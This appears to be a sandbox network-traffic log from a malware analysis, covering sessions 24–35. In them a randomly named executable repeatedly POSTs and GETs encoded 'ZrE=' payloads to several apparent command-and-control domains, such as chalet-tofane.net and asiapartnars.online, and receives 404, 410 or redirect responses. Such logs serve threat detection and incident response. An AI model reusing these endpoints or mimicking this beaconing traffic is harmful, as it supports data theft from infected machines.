Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 50011 | 62.149.128.40 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:40:26.656594992 CET | 848 | OUT | POST /obbp/ HTTP/1.1
                                                                                                                                                        Host: www.chalet-tofane.net
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.chalet-tofane.net
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.chalet-tofane.net/obbp/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=n+GYn1joGIvl/vN/bY72llPv+dOj55PiXqIDeXKlzwFk6OA8M9jpcYc+C3gUukSaejAYiMwpFPhEyGQ8h2yQWV2Y9D5TFkiXn9YStBnsGd8N14jGTXgBEveMDE6WB9AvMbb3f87cwgNvEixAZIZ6HcWXCy5S7SYMjcTEQ4CGx7Q9msJ8jw41rcxFKhhgoZzkLXBg/cm7/TP3Sc4TgdcWFlwTB8INPax/iQ==
Dec 5, 2024 05:40:27.948327065 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        Cache-Control: private
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:27 GMT
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Length: 4953
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
Dec 5, 2024 05:40:27.948350906 CET | 1236 | IN
                                                                                                                                                        Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
Dec 5, 2024 05:40:27.948363066 CET | 1236 | IN
                                                                                                                                                        Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
Dec 5, 2024 05:40:27.948436975 CET | 1236 | IN
                                                                                                                                                        Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
Dec 5, 2024 05:40:27.948447943 CET | 228 | IN
                                                                                                                                                        Data Ascii: directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 50012 | 62.149.128.40 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:40:29.312206984 CET | 1861 | OUT | POST /obbp/ HTTP/1.1
                                                                                                                                                        Host: www.chalet-tofane.net
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.chalet-tofane.net
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.chalet-tofane.net/obbp/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Ascii: ZrE= [TRUNCATED]
Dec 5, 2024 05:40:30.771307945 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        Cache-Control: private
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:30 GMT
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Length: 4953
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
Dec 5, 2024 05:40:30.771481037 CET | 1236 | IN
                                                                                                                                                        Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                                                                                                                        Dec 5, 2024 05:40:30.771492004 CET1236INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                                                                                                                                        Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                                                                                                                        Dec 5, 2024 05:40:30.771502018 CET1236INData Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c
                                                                                                                                                        Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                                                                                                                                        Dec 5, 2024 05:40:30.771511078 CET228INData Raw: 64 69 72 65 63 74 6f 72 79 20 61 6e 64 20 74 72 79 20 74 68 65 20 72 65 71 75 65 73 74 20 61 67 61 69 6e 2e 20 0a 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e
                                                                                                                                                        Data Ascii: directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 50013 | 62.149.128.40 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:40:32.014066935 CET | 553 | OUT | GET /obbp/?ZrE=q8u4kFvwJtfA9Pl2Tc7XzAnO7IWA4JmOGaMFAF6owipiqs4LNofKQ6whCXFZjhm4RzxlyIFmCbk02gBov1+7TAel+jFtI3CD3Jdw5DP3HME6qP+mS3NVD/GMMnbyFe0QVN3VaJo=&Jr=tnaxxtx HTTP/1.1
Host: www.chalet-tofane.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 5, 2024 05:40:33.261049986 CET | 1236 | IN | HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Thu, 05 Dec 2024 04:40:33 GMT
Connection: close
Content-Length: 5109


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 50014 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:40:38.896495104 CET | 836 | OUT | POST /566f/ HTTP/1.1
Host: www.healthyloveforall.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.healthyloveforall.net
Connection: close
Cache-Control: no-cache
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
Referer: http://www.healthyloveforall.net/566f/
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.6 | 50015 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:40:41.548202038 CET | 860 | OUT | POST /566f/ HTTP/1.1
Host: www.healthyloveforall.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.healthyloveforall.net
Connection: close
Cache-Control: no-cache
Content-Length: 232
Content-Type: application/x-www-form-urlencoded
Referer: http://www.healthyloveforall.net/566f/
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 50016 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:40:44.202023029 CET | 1873 | OUT | POST /566f/ HTTP/1.1
Host: www.healthyloveforall.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.healthyloveforall.net
Connection: close
Cache-Control: no-cache
Content-Length: 1244
Content-Type: application/x-www-form-urlencoded
Referer: http://www.healthyloveforall.net/566f/
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 50018 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:40:46.853360891 CET | 557 | OUT | GET /566f/?ZrE=81geMJs5jQmVeK4hwDBPKHBGvn0Tm7ZwgeOmc9jTU6Fy38DzzGnJ98DUeY7D2pyu2XwXZT+7XMaW7aMNMrEzQeD/F7FTjsbI9QNHnkd6Arn6dVLur5eWw9nVs6w/1EYvnvYCbSs=&Jr=tnaxxtx HTTP/1.1
Host: www.healthyloveforall.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 5, 2024 05:40:47.944267988 CET | 406 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Thu, 05 Dec 2024 04:40:47 GMT
Content-Type: text/html
Content-Length: 266
Connection: close
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZrE=81geMJs5jQmVeK4hwDBPKHBGvn0Tm7ZwgeOmc9jTU6Fy38DzzGnJ98DUeY7D2pyu2XwXZT+7XMaW7aMNMrEzQeD/F7FTjsbI9QNHnkd6Arn6dVLur5eWw9nVs6w/1EYvnvYCbSs=&Jr=tnaxxtx"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 50019 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:40:53.702259064 CET | 830 | OUT | POST /tkmh/ HTTP/1.1
Host: www.asiapartnars.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.asiapartnars.online
Connection: close
Cache-Control: no-cache
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
Referer: http://www.asiapartnars.online/tkmh/
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=8NHXdomAmuLmbsvWqbMBUXCioBvHmMB80rGQvdXCQaJGLNX8+paTuRgo2YhAdwXmTY98gScIpdfdFfb9ycsumvTJcb19Y7N+0uIFTiN39ShdPerlAx2TkEdItdpootqItJ5reRAw8I9H0mE/PQoYDeerH7HEVvsyGBZG0xrykuFWdLG/lBUzF6YnS0hf+0xphKkpc/oILJC2


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        32 | 192.168.2.6 | 50020 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        Dec 5, 2024 05:40:56.362474918 CET | 854 | OUT | POST /tkmh/ HTTP/1.1
                                                                                                                                                        Host: www.asiapartnars.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.asiapartnars.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.asiapartnars.online/tkmh/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=8NHXdomAmuLmYPnWt5kBfXChlRvH0MBw0rKQvcSZRo9GLor89ryTnBgo54h/eAXbTYhOgSgIpdjdFfL9ysQhk/TLab1/c7N+0uIFTiZN9SJdIublSliQtkc6udpostqTtJ4MeQMW8O5H0n0/MFUHZOepLrGnEad7fgU59z7G7uZ6Y9Hl5yUQXq4lS25t+UxDjKcpOokvE9nVWn8ms/ILoAoAtv+LxkBl/w==


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        33 | 192.168.2.6 | 50021 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        Dec 5, 2024 05:40:59.018286943 CET | 1867 | OUT | POST /tkmh/ HTTP/1.1
                                                                                                                                                        Host: www.asiapartnars.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.asiapartnars.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.asiapartnars.online/tkmh/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=8NHXdomAmuLmYPnWt5kBfXChlRvH0MBw0rKQvcSZRoFGKe/8vKyT1RgowYh+eAX8TY5KgSt/pbndH9z9j/Ih+vTLYb16Y7Mq0uZCTiJN9SJdIsDlCB2QhEdItdpSotrdtJxzeQJr/+ZH3Ec/cn8HSOevKbGBEaZ4fgJC92GR7vh6ac7muTZGLLJADkBM2E0wq4k6drguNuLfQSwDiNBmmxluz5L8lH9hq/OjQodE7p25SihMS29PTGOED9i1BDNRqjrWWHpIiwfwxijrZz9W0cBonNxgAE0Fn4Tv/Iy/qosnIrsLzqcfmPUC3RZXgwNKPlBYafPgn8gHYnbyLGlTC+lY0pmIMPMQWIy5/CJhHvaVH5t9lGHJhfw0VFOWEUPypM1HVCmRN+7NSxDeOTYrcwx9A1DtUfQP1aFWGAVgyniboB0DvIrj7Tt1qcT+Xn7jWJ6x+JUG9k2QMQbpuyvdHtEeg+RUwf2l/FSu8YPCVzt2UkD120B0BwHXANW/jug1+2bAY69a3FNwIAKmrMBuG3f4z2ovroS0XnDDwgA9GZ1pI/HrWbnArDu0zkCvoR84Z0N2S51KQEgHZkJK3XFNQMNWyUk5IUH2CGQDa5ftt9s2E1PT6ZY/2tXwlWVxesvPsoY42Lzt0OEXR/aTP6JbN9nE7BSw0QNdGl2fI78Dmzujc57UiRo32ai5kSfGPW9PiHaXKjT9OWutqObyPVQ+hQJXfl7qp6xc33JBpwrlp0GsqbL6XJ3WKWfoRjrnmmgKEh2fJfB7PavcVLlbj1nztNF57sWkByqIuqZU2yVdWn8Xg15mAiYby4uZbCpFkWvUMNS7Jo7NyXOo8tOOqVe+l1dEA3fYuPTdvi3bHG20tAvQy+iXSbMKMiCCBLpg1k0cs649LoS81QcJGj1NMZUfgjr5OzF1Yef2DYWI8EDnkP5g+AhZIvCglDXDrcIxAxHCTKtdcp+iHTOjLWQKTFZm4dZNwR8zyfg+IE9tR4tV01kil5Q6 [TRUNCATED]


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        34 | 192.168.2.6 | 50022 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        Dec 5, 2024 05:41:01.670289993 CET | 555 | OUT | GET /tkmh/?Jr=tnaxxtx&ZrE=xPv3ed6Vo6P/OeD+soQOKhGtpyHDw/FO+ter//brXKVYevLLhvaYsARGwIBiS273ToVNwXlIv9TeCbPJyvYOrdDnTudDZaU/k/ECAD12ggB+I5+8DAynmnMMiOBcr//QwqdtWEY= HTTP/1.1
                                                                                                                                                        Host: www.asiapartnars.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Dec 5, 2024 05:41:02.765264988 CET | 406 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:41:02 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 266
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Jr=tnaxxtx&ZrE=xPv3ed6Vo6P/OeD+soQOKhGtpyHDw/FO+ter//brXKVYevLLhvaYsARGwIBiS273ToVNwXlIv9TeCbPJyvYOrdDnTudDZaU/k/ECAD12ggB+I5+8DAynmnMMiOBcr//QwqdtWEY="}</script></head></html>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        35 | 192.168.2.6 | 50023 | 154.82.100.177 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        Dec 5, 2024 05:41:08.779948950 CET | 806 | OUT | POST /mnl8/ HTTP/1.1
                                                                                                                                                        Host: www.yu12345.xyz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.yu12345.xyz
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.yu12345.xyz/mnl8/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=cEmwKqL8AnYc8f0VWzTCtZMGfHD26U5/mqYrrS972h9VVuatWqsiIkCH5PTt7JTJjRR0tpoeB0UDdKIlwBF+Wf2hWK3kHKU6ffWzsrQ1euKJIxO78RS5umRhGem5yr691pHIVeRXwwRzbr9KQKFV3noRiYyA5SrEcvP4+zcJA7AfPsRPxjBZrdQv3oRAH6+arq7Id1zVC0Ry
                                                                                                                                                        Dec 5, 2024 05:41:10.299947023 CET | 1236 | IN | HTTP/1.1 410 Gone
                                                                                                                                                        Server: NgxFence
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:41:10 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 4303
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Ascii: <html><head><title>410</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link href='https://libs.jshub.com/font-awesome/5.10.0-12/css/fontawesome.min.css' rel='stylesheet'><link href='https://libs.jshub.com/font-awesome/5.10.0-12/css/solid.min.css' rel='stylesheet'><style>body{margin: 0px;padding: 0px;font-family: Tahoma, Pingfang SC, Microsoft YaHei, SimSun;font-size: 12px;color: #353535;background-color: #efefef;}.brdiv {clear: both;width: 100%;height: 0px;line-height: 0px;padding: 0px;margin: 0px;border: none;background-color: transparent;background-image: none;}.mdiv{position: absolute;top: 50%;left: 50%;background-color: #fff;width: 800px;height: auto;transform: translate(-50%, -50%);box-shadow: 2px 5px 5px 2px #dfdfdf;padding-bottom: 20px;}.mtd{width: 100%; height: 10px; background-color: #376888;}.mid{margin: 0px auto; text-align: center; padding: 30px 0px; width: 750px; border-bottom: solid 1px #dfdfdf;}.miitm{width: 215px;float: left;font-size: 80px; [TRUNCATED]
                                                                                                                                                        Dec 5, 2024 05:41:10.299994946 CET | 1236 | IN
                                                                                                                                                        Data Ascii: ght: 30px;float: left;font-size: 15px;font-weight: bold;color: #353535;}.miitm .fa-check-circle,.miitm .fa-times-circle,.miitm .fa-question-circle{font-size: 20px;position: absolute;bottom: 0px;right: 60px;}.mil{ width: 60px;height: 80px;flo
                                                                                                                                                        Dec 5, 2024 05:41:10.300005913 CET | 1236 | IN
                                                                                                                                                        Data Ascii: : 100%; text-align:center; float: left;height: 25px;line-height: 25px;overflow: hidden;}a{text-decoration: none;}a:hover{text-decoration:underline;}a:visited{color: blue;}.reqid{font-family: monospace;font-weight: bold;}.mwm{z-index: -1;w
                                                                                                                                                        Dec 5, 2024 05:41:10.300031900 CET | 737 | IN
